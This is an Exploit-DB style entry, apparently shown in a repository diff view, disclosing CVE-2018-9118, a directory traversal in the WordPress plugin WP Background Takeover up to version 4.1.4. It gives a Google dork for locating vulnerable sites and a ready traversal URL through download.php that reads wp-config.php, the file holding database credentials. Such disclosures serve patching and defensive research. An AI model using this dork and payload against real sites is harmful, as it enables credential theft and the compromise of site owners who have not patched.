5445de75b2
1 changes to exploits/shellcodes Wordpress Background Takeover < 4.1.4 - Directory Traversal
15 lines
No EOL
612 B
Text
15 lines
No EOL
612 B
Text
# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
|
|
# Google Dork: inurl:/plugins/wpsite-background-takeover
|
|
# Date: 2018-03-08
|
|
# Exploit Author: Colette Chamberland, Defiant, Inc.
|
|
# Vendor Homepage: https://99robots.com
|
|
# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
|
|
# Version: <= 4.1.4
|
|
# Tested on: Wordpress 4.9.x
|
|
# CVE : CVE-2018-9118
|
|
|
|
Description
|
|
|
|
Allows for an attacker to browse files via the download.php file:
|
|
|
|
http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php |